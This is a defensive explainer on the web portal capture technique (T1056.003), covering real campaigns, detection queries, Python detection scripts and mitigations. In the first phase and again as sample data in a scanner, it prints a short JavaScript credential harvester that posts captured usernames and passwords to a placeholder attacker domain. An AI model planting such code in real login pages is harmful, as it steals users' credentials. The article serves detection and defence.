Web Portal Capture sits at the intersection of initial access and persistence. An adversary who has already compromised a VPN appliance or web server can modify its login page to harvest every credential that passes through it — turning a network perimeter device into a persistent credential collection platform. Because the underlying authentication still completes successfully, users have no indication anything is wrong, and the harvested credentials can be used immediately or stockpiled for later lateral movement.
The technique maps to two MITRE ATT&CK tactics simultaneously: Credential Access (TA0006) and Collection (TA0009). This dual mapping reflects the technique's dual purpose — it steals credentials while also serving as an ongoing data collection mechanism that persists as long as the portal modification remains in place. Documented real-world incidents show threat actors maintaining modified login pages for weeks or months, collecting credentials from entire user populations without raising alerts.
How Web Portal Capture Works
The attack sequence begins before T1056.003 itself — an adversary must first gain sufficient access to the web server or network appliance hosting the login portal. This initial foothold is commonly obtained through exploitation of a vulnerability in the portal software itself, through use of already-compromised administrative credentials, or through exploitation of a separate system with access to the portal's file system. Once administrative or file system access to the portal exists, the technique proceeds in predictable phases.
Phase 1: Portal Modification
The adversary locates the login page source files and injects malicious code. On Cisco ASA WebVPN appliances this typically means modifying webvpn_login.html or related JavaScript. On Microsoft Exchange OWA deployments, the target is often logon.aspx or associated client-side scripts served by IIS. On Ivanti Connect Secure (formerly Pulse Secure), JavaScript files loaded during the login sequence are modified. The injection is typically a small block of JavaScript that registers an event listener on the login form's submit event:
```javascript
// Example of the style of injection used in portal capture attacks
// Attacker adds this to the login page's JavaScript
document.getElementById('loginForm').addEventListener('submit', function() {
  var u = document.getElementById('username').value;
  var p = document.getElementById('password').value;
  var img = new Image();
  img.src = 'https://attacker-controlled-domain.com/collect?u='
    + encodeURIComponent(u) + '&p=' + encodeURIComponent(p);
});
```
The code above illustrates the general pattern. The actual implementations used by threat actors such as WARPWIRE are more sophisticated, using obfuscation and encoded transmissions to reduce detectability, but the underlying mechanism is consistent: capture form field values on submission and transmit them to external infrastructure.
Phase 2: Credential Interception and Exfiltration
When a legitimate user submits their credentials through the compromised portal, the injected code fires before or during the authentication POST request. The captured username and password values are transmitted — typically via an asynchronous HTTP request or a pixel-tracking technique using an image object — to an attacker-controlled server. The authentication request still reaches its intended destination, so the user logs in normally and has no indication the capture occurred.
In server-side variants of this technique, the malicious code is embedded in the portal's backend rather than in client-side JavaScript. IceApple, a post-exploitation framework targeting IIS-based environments, includes an OWA credential logger module that monitors authentication requests at the server level and records submitted credentials without modifying the client-facing login page at all. This approach is harder to detect through client-side file integrity monitoring alone.
MFA Bypass Potential
Web Portal Capture can defeat multi-factor authentication in real time. If the login portal presents an MFA code field, the injected code captures the one-time code alongside the password and immediately relays it to the attacker. The attacker can replay both the password and the valid OTP code within the token's validity window — typically 30 to 60 seconds — to authenticate as the victim. This real-time relay attack was observed during the Leviathan Australian Intrusions campaign, where attackers captured submitted MFA codes from compromised remote access portals.
Real-World Case Studies
Cutting Edge: Ivanti Connect Secure Zero-Day Exploitation (2023–2024)
In one of the most significant documented uses of T1056.003, threat actors exploited two zero-day vulnerabilities in Ivanti Connect Secure VPN — CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) — to achieve unauthenticated remote code execution on affected appliances. Volexity first identified active exploitation in early December 2023, with public reporting published in January 2024. Following RCE, the attackers modified a legitimate JavaScript file associated with the web SSL VPN login process. The altered script intercepted credentials entered by users and transmitted them to attacker-controlled infrastructure. CISA subsequently responded to multiple incidents involving these vulnerabilities, noting that in some cases the compromise resulted in full domain compromise. The WARPWIRE credential harvester, deployed as part of this campaign, was purpose-built for this style of portal-level credential capture and could harvest credentials submitted during the web login process to access layer-seven applications including RDP.
Cisco WebVPN Virtual Private Keylogging (2015)
Volexity's 2015 research into what they termed "virtual private keylogging" documented adversaries compromising Cisco ASA WebVPN login pages to harvest user credentials. The attackers modified the webvpn_login.html portal file on compromised Cisco devices to inject JavaScript that captured submitted credentials before forwarding the login to the VPN appliance. The modified portals transmitted the harvested credentials to external servers, giving the adversary persistent access to new credentials with each user login. This remains one of the foundational documented examples of T1056.003 and is cited in the official MITRE ATT&CK entry for the technique.
IceApple OWA Credential Logging
CrowdStrike documented IceApple, a post-exploitation framework targeting IIS-based web applications, in May 2022. One of IceApple's modules specifically monitors OWA authentication requests and logs submitted credentials at the server level, without modifying client-facing files. This server-side approach means client-side file integrity monitoring of OWA JavaScript would not detect the compromise — the modification is to IIS-registered modules rather than served HTML or JS files. The IceApple framework was assessed by CrowdStrike as the work of a nation-state adversary, given the sophistication of its anti-forensic capabilities and the targeting profile of observed incidents.
TEMP.Veles and the Triton Attack
During the Triton safety instrumented system attack targeting a Middle Eastern petrochemical facility, TEMP.Veles — the threat group behind the TRITON/TRISIS malware — used a web portal capture approach to collect credentials as users changed their passwords on a compromised system. Login codes submitted through a web interface were redirected to sites under the attackers' control. This case illustrates T1056.003 being used in an industrial control system context, where credential access to operational technology networks carries potentially catastrophic consequences beyond the typical data theft or ransomware scenarios seen in IT environments.
Winter Vivern Government Portal Spoofing
Winter Vivern, a threat group with ties to Belarusian and Russian intelligence interests, was documented by SentinelOne registering and hosting domains that mirrored the appearance of legitimate government email login portals across European countries. Targets included email infrastructure used by government officials and defense organizations. Rather than modifying a legitimate portal, Winter Vivern created convincing replicas that captured submitted credentials before optionally forwarding users to the real service. This variant blends T1056.003 with phishing infrastructure but achieves the same outcome — credential capture through a web-based login interface that users believe to be genuine.
Detection Strategies
Detection for T1056.003 is strongest when multiple monitoring layers are combined. No single control catches all variants — server-side modifications evade client-side file monitoring, and obfuscated JavaScript can evade simple keyword-based content inspection. Layering file integrity monitoring, network egress analysis, and periodic manual review of portal code provides the best coverage.
File Integrity Monitoring — Login Portal Files
```
# Linux / auditd: monitor writes to known portal file paths
-w /opt/pulsesecure/web/login/ -p wa -k portal_modify
-w /var/www/html/vpn/ -p wa -k portal_modify
```

```spl
# Windows / Sysmon Event ID 11: file creation in IIS web roots
# Look for writes to OWA paths outside of expected update windows
index=windows source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"
EventCode=11
TargetFilename IN (
    "*\\OWA\\auth\\*",
    "*\\OWA\\*\\logon.aspx",
    "*\\WebVPN\\*"
)
| stats count by Computer, TargetFilename, Image, User
```
Network Egress — Outbound Connections from Portal Hosts
```spl
# Splunk: alert on outbound connections from VPN/portal servers
# to destinations not in the approved outbound allow-list.
# vpn_appliance_ips and internal_network are placeholders for a lookup of
# portal host addresses and a CIDR match on internal ranges; substitute your own.
index=network sourcetype=firewall
src_ip IN (vpn_appliance_ips)
dest_ip!=internal_network
action=allowed
| stats count by src_ip, dest_ip, dest_port
| where count > 5
| sort - count
```
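The same egress check as a stand-alone script that can be run over exported firewall logs when no SIEM is at hand. This is an added example, not from the original article; the portal host addresses, allow-list, internal ranges and log lines are constructed placeholders.

```python
import ipaddress
from collections import Counter

# Hypothetical inventory: portal hosts (the search's vpn_appliance_ips), approved
# external destinations and internal ranges; replace with your own values.
PORTAL_HOSTS = {"10.0.5.10", "10.0.5.11"}
ALLOWED_EXTERNAL = {"198.51.100.7"}                      # e.g. vendor update server
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]
THRESHOLD = 5                                            # "| where count > 5"

# Constructed sample firewall log, one key=value flow record per line (not real traffic)
SAMPLE_LOG = (
    ["src_ip=10.0.5.10 dest_ip=10.0.1.20 dest_port=636 action=allowed"] * 3      # LDAPS back-end
    + ["src_ip=10.0.5.10 dest_ip=203.0.113.44 dest_port=443 action=allowed"] * 7  # unknown external
    + ["src_ip=10.0.5.10 dest_ip=198.51.100.7 dest_port=443 action=allowed"] * 9  # allow-listed
    + ["src_ip=10.0.5.11 dest_ip=192.0.2.9 dest_port=443 action=allowed"] * 2     # below threshold
    + ["src_ip=10.0.5.11 dest_ip=192.0.2.9 dest_port=443 action=blocked"] * 8     # already blocked
    + ["src_ip=10.0.9.9 dest_ip=203.0.113.44 dest_port=443 action=allowed"] * 6   # not a portal host
)

def parse_line(line):
    """Parse 'k=v k=v ...' into a dict, skipping malformed tokens."""
    fields = {}
    for tok in line.split():
        if "=" in tok:
            key, value = tok.split("=", 1)
            fields[key] = value
    return fields

def is_internal(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False                    # unparsable address: treat as not internal
    return any(addr in net for net in INTERNAL_NETS)

def suspicious_egress(lines, threshold=THRESHOLD):
    """Count allowed flows from portal hosts to external, non-allow-listed
    destinations; return {(src, dest, port): count} for counts above threshold,
    highest count first."""
    counts = Counter()
    for line in lines:
        f = parse_line(line)
        if not all(k in f for k in ("src_ip", "dest_ip", "dest_port", "action")):
            continue
        if f["src_ip"] not in PORTAL_HOSTS or f["action"] != "allowed":
            continue
        if is_internal(f["dest_ip"]) or f["dest_ip"] in ALLOWED_EXTERNAL:
            continue
        counts[(f["src_ip"], f["dest_ip"], f["dest_port"])] += 1
    return {k: n for k, n in counts.most_common() if n > threshold}

if __name__ == "__main__":
    for (src, dest, port), n in suspicious_egress(SAMPLE_LOG).items():
        print(f"ALERT portal host {src} -> {dest}:{port} ({n} allowed flows)")
```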
Behavioral Indicators
| Indicator | What It Means |
|---|---|
| Unexpected modification timestamp on login page HTML or JavaScript files | File integrity violation; login portal files should only change during sanctioned update windows |
| New outbound HTTP/HTTPS connections from a VPN or OWA host to external IPs | Possible credential exfiltration channel; portal servers have no business reason to initiate external connections |
| JavaScript containing XMLHttpRequest, fetch(), or new Image() calls to non-organizational domains in login page source | Classic credential exfiltration pattern; these calls should never appear in a legitimate authentication flow |
| Unexpected IIS module or HTTP handler registration on OWA or SharePoint server | Server-side credential capture; IceApple-style modules register as IIS components to log authentication traffic |
| Base64-encoded strings or obfuscated JavaScript blocks appearing in portal page source after a change event | Injected credential harvesting code typically obfuscates endpoint URLs and payload formatting |
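An added example, not from the original article, that applies the table's indicators to a login page captured from an external vantage point: it diffs the capture against a known-good baseline, flags exfil-style calls together with any nearby URL whose host is outside the organisation, and flags long opaque string literals. The organisation domains and both page captures are constructed.

```python
import difflib
import re
from urllib.parse import urlparse

# Hypothetical organisation domains; a URL to any other host near an exfil-style call is external
ORG_DOMAINS = ("vpn.example.com", "example.com")
EXFIL_CALLS = re.compile(r"new\s+Image\s*\(|fetch\s*\(|XMLHttpRequest|sendBeacon\s*\(")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{48,}={0,2}")   # long opaque string literal

def is_org_host(host):
    return any(host == d or host.endswith("." + d) for d in ORG_DOMAINS)

def added_lines(baseline, current):
    """Lines present in the current capture but absent from the known-good baseline."""
    diff = difflib.unified_diff(baseline.splitlines(), current.splitlines(), lineterm="", n=0)
    return [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]

def scan_login_page(current, baseline):
    """Return findings; an empty list means the capture matches the baseline and is clean."""
    findings = []
    new = added_lines(baseline, current)
    if new:
        findings.append(f"{len(new)} line(s) not in baseline")
    for m in EXFIL_CALLS.finditer(current):
        # look a short distance past the call for the destination it sends to
        window = current[m.start():m.start() + 300]
        ext = [u for u in URL_RE.findall(window)
               if not is_org_host(urlparse(u).hostname or "")]
        note = f" -> external {ext[0]}" if ext else ""
        findings.append(f"{m.group(0).strip()} at offset {m.start()}{note}")
    for blob in B64_BLOB.findall(current):
        findings.append(f"opaque blob ({len(blob)} chars)")
    return findings

# Constructed known-good capture of a login page (no vendor's real page)
BASELINE = """<html><body>
<form id="loginForm" action="/login" method="post">
<input id="username" name="username"><input id="password" name="password" type="password">
<button type="submit">Sign in</button></form>
<script src="https://vpn.example.com/js/login.js"></script>
</body></html>"""

# The same page after injection of the harvesting pattern shown earlier in the article
INJECTED = BASELINE.replace("</body>", """<script>
var k="ZGVhZGJlZWZkZWFkYmVlZmRlYWRiZWVmZGVhZGJlZWZkZWFkYmVlZg==";
document.getElementById('loginForm').addEventListener('submit',function(){
var i=new Image();i.src='https://attacker-controlled-domain.com/collect?u='+
encodeURIComponent(document.getElementById('username').value);});
</script></body>""")

if __name__ == "__main__":
    for finding in scan_login_page(INJECTED, BASELINE):
        print("FINDING:", finding)
```

Run it periodically against fresh captures of each externally facing login page and treat any non-empty result as a change that needs a matching change ticket.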
Known Threat Actors Using T1056.003
Web Portal Capture is primarily associated with nation-state and advanced persistent threat actors because the technique requires prior access to the targeted portal infrastructure and tends to be deployed as part of longer-term operations rather than opportunistic attacks.
- Cutting Edge campaign actors (suspected China-nexus) — Deployed WARPWIRE credential harvester against Ivanti Connect Secure VPN appliances following zero-day exploitation in late 2023 and early 2024, affecting organizations across government, defense, and critical infrastructure sectors.
- TEMP.Veles (Russia, GRU-linked) — Used web portal credential capture as part of the broader Triton/TRISIS ICS attack campaign, redirecting credentials submitted through a web interface to attacker-controlled infrastructure.
- IceApple operators (suspected nation-state) — Deployed IceApple's OWA credential logger module against IIS-based email and collaboration portals, capturing authentication credentials at the server level without modifying client-facing files.
- Winter Vivern (Belarus/Russia-aligned) — Created spoofed login portals mirroring government email services used by European government officials and defense personnel, capturing credentials submitted to the fake portals.
- Leviathan / APT40 (China) — Observed capturing MFA codes in real time from compromised remote access portals during the Leviathan Australian Intrusions campaign, demonstrating T1056.003 being used to defeat two-factor authentication.
Defensive Recommendations
- Implement file integrity monitoring on all portal-facing web server paths: Configure FIM tools to alert on any change to HTML, JavaScript, ASPX, PHP, and configuration files within the web roots of VPN appliances, OWA servers, SSO portals, and any other externally facing authentication services. Changes should require a change ticket correlation to be considered authorized — unanticipated file modifications are high-confidence indicators of compromise.
- Apply strict egress filtering on portal host systems: VPN appliances, OWA servers, and authentication portals have no legitimate business reason to initiate outbound connections to the internet. Enforce egress rules at the firewall and host level that block all outbound connections from these systems except to defined update servers, logging infrastructure, and authentication back-ends. Alert on any outbound connection that falls outside these approved destinations.
- Separate administrative access from portal operation: Never use the same accounts for day-to-day operations and portal administration. Privileged accounts with the ability to modify portal files or IIS module registrations should be used exclusively for that purpose, stored in a PAM solution, and require MFA with phishing-resistant authenticators. Restricting who can modify portal code reduces the attack surface significantly.
- Audit IIS module registrations and HTTP handlers regularly: On Windows-based portals running OWA or SharePoint, periodically review registered IIS modules and HTTP handlers for unexpected entries. IceApple-style server-side credential loggers register as IIS components that survive portal file restores — they will not be caught by JavaScript-level inspection. SIEM alerting on changes to IIS configuration (Event ID 4657 for IIS configuration changes) provides coverage.
- Use hardware-bound or phishing-resistant MFA: While T1056.003 can capture TOTP codes in a real-time relay scenario, hardware security keys (FIDO2/WebAuthn) bind authentication to the origin domain. A user authenticating to a spoofed portal or a real portal with injected code that attempts to relay to a different origin will have the authentication fail because the key's signature is domain-specific. Deploying FIDO2 keys eliminates the MFA bypass risk inherent in portal capture attacks.
- Conduct periodic manual source review of externally facing login pages: Automated FIM catches file modification timestamps, but obfuscated injection in cached or dynamically generated content may not always trigger standard FIM alerts. Periodically download and manually review the source of externally served login pages from an external vantage point — what an attacker's injection would serve to users — and compare against known-good baseline captures.
- Apply prompt patching to VPN appliances and web portal software: A significant portion of documented T1056.003 incidents begin with exploitation of a known or zero-day vulnerability in the portal software itself. Maintaining aggressive patch cadences for Ivanti, Cisco, Citrix, and similar appliances eliminates the initial access vector that enables portal modification. Where vendor patches are delayed, consider temporary mitigations such as access restriction or taking the portal offline until the patch is available.
MITRE ATT&CK Mapping
| Field | Value |
|---|---|
| Technique ID | T1056.003 |
| Technique Name | Input Capture: Web Portal Capture |
| Parent Technique | T1056 — Input Capture |
| Tactics | Credential Access (TA0006), Collection (TA0009) |
| Platforms | Linux, Windows, macOS |
| Data Sources | File: File Modification; Network Traffic: Network Connection Creation; Application Log: Application Log Content |
| Mitigations | M1026 Privileged Account Management |
| ATT&CK Version | v18 (Last Modified: 24 October 2025) |
| MITRE Reference | attack.mitre.org/techniques/T1056/003 |
Frequently Asked Questions
What is T1056.003 Web Portal Capture?
T1056.003 Web Portal Capture is a MITRE ATT&CK sub-technique under Input Capture (T1056) in which adversaries inject credential-harvesting code into externally facing login portals such as VPN appliances, OWA, and SSO interfaces. The injected code intercepts usernames and passwords entered by legitimate users and transmits them to attacker-controlled infrastructure, often transparently so the user's authentication still succeeds.
How do adversaries carry out Web Portal Capture?
Adversaries first gain access to the web server or appliance hosting the login portal — either through initial exploitation of a vulnerability or by using previously compromised administrative credentials. They then modify the login page's HTML, JavaScript, or server-side code to capture form field values before the authentication request is forwarded. The captured credentials are stored locally or transmitted to a remote server under their control.
How can organizations detect Web Portal Capture?
Detection focuses on monitoring web server file integrity for unauthorized modifications to login-facing files, alerting on unexpected outbound connections from portal hosts, and reviewing IIS module registrations or JavaScript loaded by authentication pages. File integrity monitoring tools and SIEM alerting on changes to known portal file paths are effective first-line controls.
Sources and References
- MITRE ATT&CK — T1056.003 Input Capture: Web Portal Capture: attack.mitre.org
- Volexity — Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence: volexity.com
- Volexity — Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN: volexity.com
- Mandiant — Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation: mandiant.com
- CrowdStrike — ICEAPPLE: A Novel Internet Information Services Post-Exploitation Framework: crowdstrike.com
- CISA — Threat Actors Exploit Multiple Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways (AA24-060B): cisa.gov
- SentinelOne — Winter Vivern: Uncovering a Wave of Global Espionage: sentinelone.com